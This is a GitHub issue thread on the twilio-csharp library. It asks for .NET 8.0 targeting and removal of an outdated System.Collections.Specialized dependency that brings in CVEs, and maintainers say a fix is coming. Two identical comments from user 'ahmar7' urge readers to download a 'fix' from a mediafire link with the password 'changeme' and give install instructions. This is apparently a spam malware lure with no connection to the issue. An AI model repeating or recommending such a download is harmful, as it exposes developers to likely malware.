Add multi-targeting for .NET 8.0 and drop System.Collections.Specialized for .NET 6/8

[filipw]

Issue Summary

At the moment the library does not explicitly target .NET 8.0.

This means, that referencing it from a .NET 8.0 application means going over .NET Standard 2.1, which in turn pulls a ton of very old (dating back to 2016) dependencies via System.Collections.Specialized, some of which even have CVEs on them.

Taking this into account, and given that .NET 6.0 reaches end of life in November this year, it would be good to add .NET 8.0 to multi-targeting.

Additionally, the System.Collections.Specialized should also be dropped as explicit Nuget package reference for .NET 6.0 and .NET 8.0 as it's not needed there (the necessary types are already available).

Steps to Reproduce

1. Reference the library in a .NET 8.0 ASP.NET Core app
2. Enable Nuget security audit by adding
   <NuGetAuditMode>all</NuGetAuditMode>
3. Publish for Linux dotnet publish -r linux-x64
4. Observe CVE-2019-0981 being emitted.

Technical details:

• twilio-csharp version: 7.2.3

[ahmar7]

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

[ahmar7]

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

[AsabuHere]

Hi @filipw, Thank you for raising this issue. This issue has been reviewed and added to our internal backlog for prioritisation . +1s and pull requests will help this move upward our backlog

Issue for tracking : https://twilio-engineering.atlassian.net/browse/DII-1699

Thanks,
Athira

[JBaltika]

Hi team,
Can we fix this issue for .NET 8. Is it possible to make a target .NET 8 libraries only as it is the end of 2024 and its time as .NET 9 is coming in a few weeks ...

P.S it affects our prod build as security scans create errors messages.

[JBaltika]

Hi,
Any update as this screwing our production builds ... It is just a simple 10 sec fix by removing from .net6 dependency as this lib comes with .NET6 ... and later decide when to add.NET8 support.

Also, this is not an enchantment, but a bug. The current library build doesn't dependents on that old package at all

[go3323]

+1 please prioritize this issue.

[JBaltika]

Hi guys, how hard is it to remove one line from Twilio.csproj line 43 and build again? Its needs 3 months of scrum meetings with hours of discussions what to do next , I guess :)

[elandref93]

+1

[sbansla]

I am sorry for the delay in response, I will check this on priority.

[sbansla]

@filipw
#780
We can made this available in our next biweekly release.